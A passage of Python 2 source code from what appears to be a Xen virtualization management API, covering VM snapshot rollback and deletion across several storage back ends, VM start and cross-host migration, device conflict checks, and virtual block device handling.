mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.snapshot(sr, vdi_ref, name)
log.debug("snapshot result : %s " % result)
return xen_api_success(result)
def VM_rollback(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Rollback a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_rollback_vdi(session, vdi_ref, name)
def _VM_rollback_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_rollback
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
log.debug('rollback gpfs>>>>>')
p_location = vdi_rec['location'].split(':')[1]
index = p_location.rfind('/')
if index != -1:
file_name = p_location[index+1:]
new_location = p_location[:index+1] + name + p_location[index+1:]
snap_location = '%s/%s/.snapshots/%s/%s' %(sr_rec['location'], vdi_ref, \
name, file_name)
log.debug('=====>VM rollback :snap location %s=====' % snap_location)
log.debug('new_location: %s' % new_location)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_gpfs(snap_location, new_location, p_location)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.rollback(sr, vdi_ref, name)
log.debug("rollback result : %s " % result)
return xen_api_success(result)
def VM_destroy_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Destroy a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_vdi_snapshot(session, vdi_ref, name)
def VM_destroy_all_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Destroy all snapshots of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_all_vdi_snapshots(session, vdi_ref)
def _VM_destroy_all_vdi_snapshots(self, session, vdi_ref, sr = None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_all_snapshots
'''
storage = self._get_BNStorageAPI_instance()
if not sr:
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_all_gpfs(gpfs_name, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_mfs(mfs_name, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy_all(sr, vdi_ref)
log.debug("destroy_snapshot result : %s " % result)
if result == True: # destroy succeed
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def _VM_destroy_vdi_snapshot(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_gpfs(gpfs_name, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
log.debug(name)
result = proxy.destroy_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy(sr, vdi_ref, name)
log.debug("destroy_snapshot result : %s " % result)
# if thereis not snapshots and vdi is not in relation with vm
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
snap_num = len(self._VM_get_vdi_snapshots(session, vdi_ref).get('Value'))
if snap_num == 0:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_resume(session, vm_ref, start_paused)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_resume', vm_ref, start_paused)
else:
return self._VM_resume(session, vm_ref, start_paused)
def _VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_resume", vm_ref,
start_paused = start_paused)
def VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_start(session, vm_ref, start_paused, force_start)
else:
return xen_rpc_call(host_ip, 'VM_start', vm_ref, start_paused, force_start)
else:
return self._VM_start(session, vm_ref, start_paused, force_start)
def _VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_start
'''
if not self._VM_can_start(session, vm_ref):
return xen_api_error(['MEMORY_NOT_ENOUGH', 'VM', vm_ref])
crush_vm = self._VM_check_fibers_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['FIBER_IN_USE:', crush_vm])
crush_vm = self._VM_check_usb_scsi_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['USB_IN_USE:', crush_vm])
try:
log.debug("VM starting now....")
response = XendTask.log_progress(0, 100, do_vm_func,
"domain_start", vm_ref,
start_paused=start_paused,
force_start=force_start)
log.debug(response)
return response
except HVMRequired, exn:
log.error(exn)
return xen_api_error(['VM_HVM_REQUIRED', vm_ref])
#add by wufan
def VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check specified VM can start or not, check host free memory.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict
@raise xen_api_error:
'''
return xen_api_success(self._VM_can_start(session, vm_ref))
def _VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_can_start
'''
host_mem_free = self._host_metrics_get_memory_free()
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if not dominfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['VM_NOT_FOUND', 'VM', vm_ref])
if self._VM_get_is_a_template(session, vm_ref).get('Value'):
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
dom_mem = dominfo.get_memory_dynamic_max()
free_memory = int(host_mem_free) - int(dom_mem)
log.debug("can start: %s, memory left limit: %sG" % (str(cmp(free_memory, RESERVED_MEM) > 0), str(RESERVED_MEM/1024/1024/1024)))
log.debug("free memory: %sG" % str(free_memory/1024/1024/1024))
# by henry, dom0 memory should greate than 4G
if cmp(free_memory, RESERVED_MEM) > 0:
return True
else:
return False
def _host_metrics_get_memory_free(self):
'''
@author: wuyuewen
@summary: Internal method.
@see: host_metrics_get_memory_free
'''
node = XendNode.instance()
xendom = XendDomain.instance()
doms = xendom.list()
doms_mem_total = 0
for dom in doms:
if cmp(dom.get_uuid(), DOM0_UUID) == 0:
continue
dominfo = xendom.get_vm_by_uuid(dom.get_uuid())
doms_mem_total += dominfo.get_memory_dynamic_max()
# log.debug("doms memory total: " + str(doms_mem_total))
# log.debug("host memory total:" + str(node.xc.physinfo()['total_memory'] * 1024))
return node.xc.physinfo()['total_memory'] * 1024 - doms_mem_total
'''
check whether vif is create and up
'''
def _VM_check_vif_up(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('check if vif up >>>>>>>>>>')
# get vm domid
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
vif_num = len(dominfo.get_vifs()) # get num of vifs
log.debug('vm(%) domid(%s) has %s vifs' % (vm_ref, domid, vif_num))
for eth_num in range(vif_num):
vif_dev = 'vif%s.%s' % (domid, eth_num)
vif_emu_dev = 'vif%s.%-emu' %(domid, eth_num)
# def _VM_check_fiber(self, session, vm_ref):
# if self._VM_check_fibers_valid(session, vm_ref).get('Value'):
# return True
# else :
# log.debug('fiber device in use')
# return False
def VM_start_on(self, session, vm_ref, host_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM on specified Host. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param host_ref: Host's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
# import threading
# lock = threading.Lock()
# lock.acquire()
#self.__init_lock__.acquire()
try:
log.debug("in VM_start_on: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return self.VM_start(session, vm_ref, start_paused, force_start)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
log.debug(h_ip)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_start_on ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = self._VM_start(session, vm_ref, start_paused, force_start)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
log.debug("vm dest: node, vm now: master")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = self.VM_start(session, vm_ref, start_paused, force_start)
else:
log.debug("-----condition 5-----")
log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref)
log.debug("Finished start on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return self.VM_start(session, vm_ref, start_paused, force_start)
except Exception, exn:
log.exception(traceback.print_exc())
return xen_api_error(['START_ON_FAILED,', exn])
finally:
if path:
cmd = 'rm -f %s' % path
doexec(cmd)
def VM_copy_sxp_to_nfs(self, session, vm_ref, path):
'''
@author: wuyuewen
@summary: Internal method. Copy sxp to HA dir.
'''
XendDomain.instance().copy_sxp_to_ha(vm_ref, path)
return xen_api_success_void()
def VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_suspend(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_suspend', vm_ref)
else:
return self._VM_suspend(session, vm_ref)
def _VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_suspend", vm_ref)
def VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_unpause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_unpause', vm_ref)
else:
return self._VM_unpause(session, vm_ref)
def _VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_unpause", vm_ref)
def VM_send_sysrq(self, _, vm_ref, req):
'''
@deprecated: not used
'''
xeninfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if xeninfo.state == XEN_API_VM_POWER_STATE_RUNNING \
or xeninfo.state == XEN_API_VM_POWER_STATE_PAUSED:
xeninfo.send_sysrq(req)
return xen_api_success_void()
else:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[xeninfo.state]])
def VM_send_trigger(self, _, vm_ref, trigger, vcpu):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_send_trigger(xeninfo.getDomid(), trigger, vcpu)
return xen_api_success_void()
def VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@deprecated: not used
'''
return self._VM_migrate(session, vm_ref, destination_url, live, other_config)
def _VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_pool_migrate
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
port = other_config.get("port", 0)
node = other_config.get("node", -1)
ssl = other_config.get("ssl", None)
chs = other_config.get("change_home_server", False)
xendom.domain_migrate(xeninfo.getDomid(), destination_url,
bool(live), port, node, ssl, bool(chs))
#log.debug('migrate')
# set all tag
#self.VM_set_all_tag(session, vm_ref)
return xen_api_success_void()
def VM_pool_migrate(self, session, vm_ref, dst_host_ref, other_config):
'''
@author: wuyuewen
@summary: Migrate specified VM to specified Host. IO limit setting must read
before migrate and set back after migrate.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param dst_host_ref: destination Host's uuid
@param other_config: useless
@return: True | False
@rtype: dict.
'''
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
dst_host_ip = BNPoolAPI.get_host_ip(dst_host_ref)
tag_list = self.VM_get_all_tag(session, vm_ref, 'tag').get('Value')
rate_list = self.VM_get_all_tag(session, vm_ref, 'rate').get('Value')
burst_list = self.VM_get_all_tag(session, vm_ref, 'burst').get('Value')
io_limit_list = {}
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
key = "%s_%s" % (type, io_unit)
io_limit_list[key] = self.VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_migrate(session, vm_ref, dst_host_ip, True, other_config)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(host_ip, "VM_migrate", vm_ref, dst_host_ip, True, other_config)
log.debug("Migrate VM from host: %s" % host_ip)
log.debug("Migrate VM to host: %s" % dst_host_ip)
BNPoolAPI.update_data_struct("vm_migrate", vm_ref, host_ref, dst_host_ref)
self.VM_set_all_tag(session, vm_ref, tag_list)
self.VM_set_all_rate(session, vm_ref, 'rate', rate_list)
self.VM_set_all_rate(session, vm_ref, 'burst', burst_list)
self.VM_start_set_IO_limit(session, vm_ref, io_limit_list)
return xen_api_success_void()
def VM_save(self, _, vm_ref, dest, checkpoint):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_save(xeninfo.getDomid(), dest, checkpoint)
return xen_api_success_void()
def VM_restore(self, _, src, paused):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xendom.domain_restore(src, bool(paused))
return xen_api_success_void()
def VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
return self._VM_check_usb_scsi_valid(session, vm_ref)
def _VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_usb_scsi(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
return self._VM_check_fibers_valid(session, vm_ref)
#add by wufan
def _VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_fibers(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_cpu_pool_migrate(self, session, vm_ref, cpu_pool_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
domid = xeninfo.getDomid()
pool = XendAPIStore.get(cpu_pool_ref, XendCPUPool.getClass())
if pool == None:
return xen_api_error(['HANDLE_INVALID', 'cpu_pool', cpu_pool_ref])
if domid is not None:
if domid == 0:
return xen_api_error(['OPERATION_NOT_ALLOWED',
'could not move Domain-0'])
try:
XendCPUPool.move_domain(cpu_pool_ref, domid)
except Exception, ex:
return xen_api_error(['INTERNAL_ERROR',
'could not move domain'])
self.VM_set('pool_name', session, vm_ref, pool.get_name_label())
return xen_api_success_void()
def VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only=False):
'''
@author: wuyuewen
@summary: VM create data VBD and VDI.
@precondition: At most 8 data VBD.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_create_data_VBD', vm_ref, vdi_ref, read_only)
else:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
def _VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_create_data_VBD
'''
log.debug("=====VM_create_data_VBD=====")
if not read_only:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'RW',
'type' : 'Disk',
}
else:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'R',
'type' : 'Disk',
}
response = self._VBD_create(session, vbd_struct)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
def VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: VM delete data VBD and VDI.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_delete_data_VBD', vm_ref, vdi_ref)
else:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
def _VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_delete_data_VBD
'''
self.__vbd_lock__.acquire()
try:
log.debug("=====VM_delete_data_VBD=====")
log.debug('VDI ref: %s' % vdi_ref)
vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
vbd = []
vbd_ref = ""
if vdi:
log.debug('get VBDs by VDI:')
vbd = vdi.getVBDs()
log.debug(vbd)
else:
return xen_api_success(False)
if vbd and isinstance(vbd, list):
vbd_ref = vbd[0]
else:
return xen_api_success(False)
log.debug("vbd ref: %s" % vbd_ref)
response = self.VBD_destroy(session, vbd_ref)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
finally:
self.__vbd_lock__.release()
# Xen API: Class VBD
# ----------------------------------------------------------------
VBD_attr_ro = ['VM',
'VDI',
'metrics',
'runtime_properties',
'io_read_kbs',
'io_write_kbs']
VBD_attr_rw = ['device',
'bootable',
'mode',
'type']
VBD_attr_inst = VBD_attr_rw
VBD_methods = [('media_change', None), ('destroy', None), ('destroy_on', None)]
VBD_funcs = [('create', 'VBD'),
('create_on', 'VBD')]
# object methods
def VBD_get_record(self, session, vbd_ref):
storage = self._get_BNStorageAPI_instance()
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cfg = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vbd_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vbd_ref
return_cfg['runtime_properties'] = {} #todo
return_cfg['io_read_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_read_kbs')
return_cfg['io_write_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_write_kbs')
if return_cfg.has_key('VDI') and return_cfg.get('VDI'):
location = storage.VDI_get_location(session, return_cfg.get('VDI')).get('Value')
if location:
return_cfg['userdevice'] = location
# log.debug(return_cfg)
return xen_api_success(return_cfg)
def VBD_media_change(self, session, vbd_ref, new_vdi_ref):
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
